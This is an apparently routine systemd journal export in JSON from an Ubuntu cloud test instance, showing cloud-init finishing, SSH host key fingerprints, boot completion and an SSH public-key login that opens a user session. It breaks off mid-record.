"_SYSTEMD_CGROUP" : "/system.slice/cloud-final.service", "_SYSTEMD_UNIT" : "cloud-final.service", "_SYSTEMD_INVOCATION_ID" : "d0aa2ce27cd0496fa1143bc5bdbebf5f", "MESSAGE" : "1024 SHA256:Na+AYIqFXLqoKkXS4zW6wF1+NS6RxOOD/JsWTw2BofU root@test-1 (DSA)", "_SOURCE_REALTIME_TIMESTAMP" : "1615280822662757" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=355;b=e2b08827b5804427b422c10c84f1567e;m=2e24064;t=5bd16dfa5bfcb;x=5d8b087493a3832b", "__REALTIME_TIMESTAMP" : "1615280822665163", "__MONOTONIC_TIMESTAMP" : "48382052", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "SYSLOG_FACILITY" : "1", "_COMM" : "logger", "_EXE" : "/usr/bin/logger", "SYSLOG_IDENTIFIER" : "ec2", "_PID" : "1044", "_CMDLINE" : "logger -p user info -t ec2 -s", "_SYSTEMD_CGROUP" : "/system.slice/cloud-final.service", "_SYSTEMD_UNIT" : "cloud-final.service", "_SYSTEMD_INVOCATION_ID" : "d0aa2ce27cd0496fa1143bc5bdbebf5f", "MESSAGE" : "256 SHA256:ik8suaV9cNf+I5fd9XYM2qoT9vF08FA3bGdE4oH0qQo root@test-1 (ECDSA)", "_SOURCE_REALTIME_TIMESTAMP" : "1615280822665156" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=356;b=e2b08827b5804427b422c10c84f1567e;m=2e24852;t=5bd16dfa5c7b9;x=24744f5bd495849b", "__REALTIME_TIMESTAMP" : "1615280822667193", "__MONOTONIC_TIMESTAMP" : "48384082", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "SYSLOG_FACILITY" : "1", "_COMM" : "logger", "_EXE" : "/usr/bin/logger", "SYSLOG_IDENTIFIER" : "ec2", "_PID" : "1044", "_CMDLINE" : "logger -p user info -t ec2 -s", "_SYSTEMD_CGROUP" : "/system.slice/cloud-final.service", "_SYSTEMD_UNIT" : "cloud-final.service", "_SYSTEMD_INVOCATION_ID" : "d0aa2ce27cd0496fa1143bc5bdbebf5f", "MESSAGE" : "256 SHA256:LGSFwDAA7B9jve87IoPLkG3UGaAwTRLkJQeTPTX2mWw root@test-1 (ED25519)", "_SOURCE_REALTIME_TIMESTAMP" : "1615280822667186" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=357;b=e2b08827b5804427b422c10c84f1567e;m=2e25165;t=5bd16dfa5d0cc;x=19e81bc8f1dd4d4b", "__REALTIME_TIMESTAMP" : "1615280822669516", "__MONOTONIC_TIMESTAMP" : "48386405", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "SYSLOG_FACILITY" : "1", "_COMM" : "logger", "_EXE" : "/usr/bin/logger", "SYSLOG_IDENTIFIER" : "ec2", "_PID" : "1044", "_CMDLINE" : "logger -p user info -t ec2 -s", "_SYSTEMD_CGROUP" : "/system.slice/cloud-final.service", "_SYSTEMD_UNIT" : "cloud-final.service", "_SYSTEMD_INVOCATION_ID" : "d0aa2ce27cd0496fa1143bc5bdbebf5f", "MESSAGE" : "2048 SHA256:yknRoTzFSZARXtHupUbaRHJq3cqluJqyPejk+7QaGXg root@test-1 (RSA)", "_SOURCE_REALTIME_TIMESTAMP" : "1615280822669509" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=358;b=e2b08827b5804427b422c10c84f1567e;m=2e252a5;t=5bd16dfa5d20c;x=5f885475c0d1e4b3", "__REALTIME_TIMESTAMP" : "1615280822669836", "__MONOTONIC_TIMESTAMP" : "48386725", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "SYSLOG_FACILITY" : "1", "_COMM" : "logger", "_EXE" : "/usr/bin/logger", "SYSLOG_IDENTIFIER" : "ec2", "_PID" : "1044", "_CMDLINE" : "logger -p user info -t ec2 -s", "_SYSTEMD_CGROUP" : "/system.slice/cloud-final.service", "_SYSTEMD_UNIT" : "cloud-final.service", "_SYSTEMD_INVOCATION_ID" : "d0aa2ce27cd0496fa1143bc5bdbebf5f", "MESSAGE" : "-----END SSH HOST KEY FINGERPRINTS-----", "_SOURCE_REALTIME_TIMESTAMP" : "1615280822669830" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=359;b=e2b08827b5804427b422c10c84f1567e;m=2e25352;t=5bd16dfa5d2ba;x=26ee703de244bf9c", "__REALTIME_TIMESTAMP" : "1615280822670010", "__MONOTONIC_TIMESTAMP" : "48386898", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "SYSLOG_FACILITY" : "1", "_COMM" : "logger", "_EXE" : "/usr/bin/logger", "SYSLOG_IDENTIFIER" : "ec2", "_PID" : "1044", "_CMDLINE" : "logger -p user info -t ec2 -s", "_SYSTEMD_CGROUP" : "/system.slice/cloud-final.service", "_SYSTEMD_UNIT" : "cloud-final.service", "_SYSTEMD_INVOCATION_ID" : "d0aa2ce27cd0496fa1143bc5bdbebf5f", "MESSAGE" : "#############################################################", "_SOURCE_REALTIME_TIMESTAMP" : "1615280822670004" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=35a;b=e2b08827b5804427b422c10c84f1567e;m=2e36e2c;t=5bd16dfa6ed93;x=35f1f96d30effd5a", "__REALTIME_TIMESTAMP" : "1615280822742419", "__MONOTONIC_TIMESTAMP" : "48459308", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_SYSTEMD_CGROUP" : "/system.slice/cloud-final.service", "_SYSTEMD_UNIT" : "cloud-final.service", "_SYSTEMD_INVOCATION_ID" : "d0aa2ce27cd0496fa1143bc5bdbebf5f", "_STREAM_ID" : "ead4da9ee39d4fce8a904628ddd9478a", "MESSAGE" : "Cloud-init v. 19.1-1-gbaa47854-0ubuntu1~18.04.1 running 'modules:final' at Tue, 09 Mar 2021 09:07:02 +0000. Up 48.19 seconds.", "_PID" : "1010", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init modules --mode=final" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=35b;b=e2b08827b5804427b422c10c84f1567e;m=2e36e2c;t=5bd16dfa6ed93;x=f45d078408a62683", "__REALTIME_TIMESTAMP" : "1615280822742419", "__MONOTONIC_TIMESTAMP" : "48459308", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_SYSTEMD_CGROUP" : "/system.slice/cloud-final.service", "_SYSTEMD_UNIT" : "cloud-final.service", "_SYSTEMD_INVOCATION_ID" : "d0aa2ce27cd0496fa1143bc5bdbebf5f", "_STREAM_ID" : "ead4da9ee39d4fce8a904628ddd9478a", "_PID" : "1010", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init modules --mode=final", "MESSAGE" : "Cloud-init v. 19.1-1-gbaa47854-0ubuntu1~18.04.1 finished at Tue, 09 Mar 2021 09:07:02 +0000. Datasource DataSourceOpenStackLocal [net,ver=2]. Up 48.44 seconds" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=35c;b=e2b08827b5804427b422c10c84f1567e;m=2e469e2;t=5bd16dfa7e94a;x=9a8a1f311ad6278b", "__REALTIME_TIMESTAMP" : "1615280822806858", "__MONOTONIC_TIMESTAMP" : "48523746", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "UNIT" : "cloud-final.service", "INVOCATION_ID" : "d0aa2ce27cd0496fa1143bc5bdbebf5f", "MESSAGE" : "Started Execute cloud user/final scripts.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280822804000" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=35d;b=e2b08827b5804427b422c10c84f1567e;m=2e476be;t=5bd16dfa7f626;x=3d51e90cf87306f1", "__REALTIME_TIMESTAMP" : "1615280822810150", "__MONOTONIC_TIMESTAMP" : "48527038", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Reached target Cloud-init target.", "UNIT" : "cloud-init.target", "INVOCATION_ID" : "12b2c5a5c7674278a29d76d29ab052c1", "_SOURCE_REALTIME_TIMESTAMP" : "1615280822807544" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=35e;b=e2b08827b5804427b422c10c84f1567e;m=2e4f15a;t=5bd16dfa870c1;x=ef22149adcde0829", "__REALTIME_TIMESTAMP" : "1615280822841537", "__MONOTONIC_TIMESTAMP" : "48558426", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "_HOSTNAME" : "test-1", "CODE_FILE" : "../src/core/manager.c", "CODE_LINE" : "3260", "CODE_FUNC" : "manager_notify_finished", "MESSAGE_ID" : "b07a249cd024414a82dd00cd181378ff", "KERNEL_USEC" : "4655018", "USERSPACE_USEC" : "43903173", "MESSAGE" : "Startup finished in 4.655s (kernel) + 43.903s (userspace) = 48.558s.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280822841333" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=35f;b=e2b08827b5804427b422c10c84f1567e;m=2fcba4f;t=5bd16dfc039b5;x=8ce63cc3a6a6ddf3", "__REALTIME_TIMESTAMP" : "1615280824400309", "__MONOTONIC_TIMESTAMP" : "50117199", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "_HOSTNAME" : "test-1", "_STREAM_ID" : "ac6fa69968fd467a979ed2236d40a21a", "SYSLOG_IDENTIFIER" : "snapd", "_PID" : "817", "_COMM" : "snapd", "_EXE" : "/usr/lib/snapd/snapd", "_CMDLINE" : "/usr/lib/snapd/snapd", "_SYSTEMD_CGROUP" : "/system.slice/snapd.service", "_SYSTEMD_UNIT" : "snapd.service", "_SYSTEMD_INVOCATION_ID" : "7ffc7748c7334851b33f278a253dc6d2", "MESSAGE" : "daemon.go:576: gracefully waiting for running hooks" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=360;b=e2b08827b5804427b422c10c84f1567e;m=2fcba4f;t=5bd16dfc039b5;x=f865ce5bd4cbe418", "__REALTIME_TIMESTAMP" : "1615280824400309", "__MONOTONIC_TIMESTAMP" : "50117199", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "_HOSTNAME" : "test-1", "_STREAM_ID" : "ac6fa69968fd467a979ed2236d40a21a", "SYSLOG_IDENTIFIER" : "snapd", "_PID" : "817", "_COMM" : "snapd", "_EXE" : "/usr/lib/snapd/snapd", "_CMDLINE" : "/usr/lib/snapd/snapd", "_SYSTEMD_CGROUP" : "/system.slice/snapd.service", "_SYSTEMD_UNIT" : "snapd.service", "_SYSTEMD_INVOCATION_ID" : "7ffc7748c7334851b33f278a253dc6d2", "MESSAGE" : "daemon.go:578: done waiting for running hooks" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=361;b=e2b08827b5804427b422c10c84f1567e;m=2fcc249;t=5bd16dfc041b0;x=f81c02bb69040e23", "__REALTIME_TIMESTAMP" : "1615280824402352", "__MONOTONIC_TIMESTAMP" : "50119241", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "_HOSTNAME" : "test-1", "_STREAM_ID" : "ac6fa69968fd467a979ed2236d40a21a", "SYSLOG_IDENTIFIER" : "snapd", "_PID" : "817", "_COMM" : "snapd", "_EXE" : "/usr/lib/snapd/snapd", "_CMDLINE" : "/usr/lib/snapd/snapd", "_SYSTEMD_CGROUP" : "/system.slice/snapd.service", "_SYSTEMD_UNIT" : "snapd.service", "_SYSTEMD_INVOCATION_ID" : "7ffc7748c7334851b33f278a253dc6d2", "MESSAGE" : "daemon stop requested to wait for socket activation" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=362;b=e2b08827b5804427b422c10c84f1567e;m=4435c5d;t=5bd16e106dbc4;x=891668ccabf0551c", "__REALTIME_TIMESTAMP" : "1615280845806532", "__MONOTONIC_TIMESTAMP" : "71523421", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "journal", "_HOSTNAME" : "test-1", "SYSLOG_FACILITY" : "9", "CODE_FILE" : "../src/timesync/timesyncd-manager.c", "SYSLOG_IDENTIFIER" : "systemd-timesyncd", "_PID" : "501", "_UID" : "62583", "_GID" : "62583", "_COMM" : "systemd-timesyn", "_EXE" : "/lib/systemd/systemd-timesyncd", "_CMDLINE" : "/lib/systemd/systemd-timesyncd", "_CAP_EFFECTIVE" : "2000000", "_SYSTEMD_CGROUP" : "/system.slice/systemd-timesyncd.service", "_SYSTEMD_UNIT" : "systemd-timesyncd.service", "_SYSTEMD_INVOCATION_ID" : "02dc978d5d9147908ffca7c0020b3270", "CODE_LINE" : "678", "CODE_FUNC" : "manager_receive_response", "MESSAGE" : "Synchronized to time server 91.189.89.199:123 (ntp.ubuntu.com).", "_SOURCE_REALTIME_TIMESTAMP" : "1615280845806492" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=363;b=e2b08827b5804427b422c10c84f1567e;m=9efca26;t=5bd16e6b34985;x=409f2dd401169ca7", "__REALTIME_TIMESTAMP" : "1615280940992901", "__MONOTONIC_TIMESTAMP" : "166709798", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "SYSLOG_FACILITY" : "4", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "SYSLOG_IDENTIFIER" : "sshd", "_COMM" : "sshd", "_EXE" : "/usr/sbin/sshd", "_SYSTEMD_CGROUP" : "/system.slice/ssh.service", "_SYSTEMD_UNIT" : "ssh.service", "_SYSTEMD_INVOCATION_ID" : "93b3a6735e0a4aa6b67f86bb4665a76e", "SYSLOG_PID" : "1092", "MESSAGE" : "Accepted publickey for ubuntu from 10.18.255.254 port 50031 ssh2: RSA SHA256:HORx/u4a1tHXBbnoTOF0nmyK3B5/06UnlHbNMExg8+g", "_PID" : "1092", "_CMDLINE" : "sshd: ubuntu [priv]", "_SOURCE_REALTIME_TIMESTAMP" : "1615280940992855" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=364;b=e2b08827b5804427b422c10c84f1567e;m=9efe4c3;t=5bd16e6b3642a;x=7334fd38c0f161a5", "__REALTIME_TIMESTAMP" : "1615280940999722", "__MONOTONIC_TIMESTAMP" : "166716611", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "SYSLOG_FACILITY" : "10", "SYSLOG_IDENTIFIER" : "sshd", "_COMM" : "sshd", "_EXE" : "/usr/sbin/sshd", "_SYSTEMD_CGROUP" : "/system.slice/ssh.service", "_SYSTEMD_UNIT" : "ssh.service", "_SYSTEMD_INVOCATION_ID" : "93b3a6735e0a4aa6b67f86bb4665a76e", "SYSLOG_PID" : "1092", "_PID" : "1092", "_CMDLINE" : "sshd: ubuntu [priv]", "MESSAGE" : "pam_unix(sshd:session): session opened for user ubuntu by (uid=0)", "_SOURCE_REALTIME_TIMESTAMP" : "1615280940999697" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=365;b=e2b08827b5804427b422c10c84f1567e;m=9f004cd;t=5bd16e6b38434;x=6c57a109f623e465", "__REALTIME_TIMESTAMP" : "1615280941007924", "__MONOTONIC_TIMESTAMP" : "166724813", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Created slice User Slice of ubuntu.", "UNIT" : "user-1000.slice", "INVOCATION_ID" : "6d2df251246544468f4d5b4b70d4730b", "_SOURCE_REALTIME_TIMESTAMP" : "1615280941007835" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=366;b=e2b08827b5804427b422c10c84f1567e;m=9f04f2c;t=5bd16e6b3ce93;x=243bdea031327f14", "__REALTIME_TIMESTAMP" : "1615280941026963", "__MONOTONIC_TIMESTAMP" : "166743852", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "_HOSTNAME" : "test-1", "MESSAGE" : "Starting User Manager for UID 1000...", "UNIT" : "user@1000.service", "INVOCATION_ID" : "70ea038d911745e89e876eac8461b685", "_SOURCE_REALTIME_TIMESTAMP" : "1615280941026951" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=367;b=e2b08827b5804427b422c10c84f1567e;m=9f088f5;t=5bd16e6b4085d;x=3242c936452d94ce", "__REALTIME_TIMESTAMP" : "1615280941041757", "__MONOTONIC_TIMESTAMP" : "166758645", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Started Session 1 of user ubuntu.", "UNIT" : "session-1.scope", "INVOCATION_ID" : "2b1962eb80184110bd624cc00819ebf7", "_SOURCE_REALTIME_TIMESTAMP" : "1615280941040021" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=368;b=e2b08827b5804427b422c10c84f1567e;m=9f0898e;t=5bd16e6b408f6;x=aced2a2b19bceba0", "__REALTIME_TIMESTAMP" : "1615280941041910", "__MONOTONIC_TIMESTAMP" : "166758798", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_EXE" : "/lib/systemd/systemd", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "SYSLOG_FACILITY" : "10", "MESSAGE" : "pam_unix(systemd-user:session): session opened for user ubuntu by (uid=0)", "_PID" : "1103", "_COMM" : "(systemd)", "_CMDLINE" : "(systemd)", "_AUDIT_SESSION" : "2", "_AUDIT_LOGINUID" : "1000", "_SYSTEMD_CGROUP" : "/user.slice/user-1000.slice/user@1000.service", "_SYSTEMD_OWNER_UID" : "1000", "_SYSTEMD_UNIT" : "user@1000.service", "_SYSTEMD_SLICE" : "user-1000.slice", "_SYSTEMD_USER_SLICE" : "-.slice", "_SYSTEMD_INVOCATION_ID" : "70ea038d911745e89e876eac8461b685", "_SOURCE_REALTIME_TIMESTAMP" : "1615280941040532" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=369;b=e2b08827b5804427b422c10c84f1567e;m=9f09ebd;t=5bd16e6b41e24;x=19c833f3edf7cc95", "__REALTIME_TIMESTAMP" : "1615280941047332", "__MONOTONIC_TIMESTAMP" : "166764221", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "journal", "SYSLOG_FACILITY" : "4", "_HOSTNAME" : "test-1", "SYSLOG_IDENTIFIER" : "systemd-logind", "_PID" : "784", "_COMM" : "systemd-logind", "_EXE" : "/lib/systemd/systemd-logind", "_CMDLINE" : "/lib/systemd/systemd-logind", "_CAP_EFFECTIVE" : "24420002f", "_SYSTEMD_CGROUP" : "/system.slice/systemd-logind.service", "_SYSTEMD_UNIT" : "systemd-logind.service", "_SYSTEMD_INVOCATION_ID" : "92ace4bf8cc84ed790e29aea96b87129", "CODE_FILE" : "../src/login/logind-session.c", "CODE_LINE" : "633", "CODE_FUNC" : "session_start", "MESSAGE_ID" : "8d45620c1a4348dbb17410da57c60c66", "SESSION_ID" : "1", "USER_ID" : "ubuntu", "LEADER" : "1092", "MESSAGE" : "New session 1 of user ubuntu.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280941042545" } { "__CURSOR" : "s=b561a865bb2f43f8b38c4b1fb9ac78ae;i=36a;b=e2b08827b5804427b422c10c84f1567e;m=9f360e2;t=5bd16e6b6e049;x=c762ed8af5f522cf", "__REALTIME_TIMESTAMP" : "1615280941228105", "__MONOTONIC_TIMESTAMP" : "166944994", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "SYSLOG_IDENTIFIER" : "systemd", "MESSAGE" : "Reached target Timers.", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "USER_UNIT" : "timers.target", "USER_INVOCATION_ID" : "c32bba9a46b6418a87022db13a18acc5", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_TRANSPORT" : "journal", "_PID" : "1103", 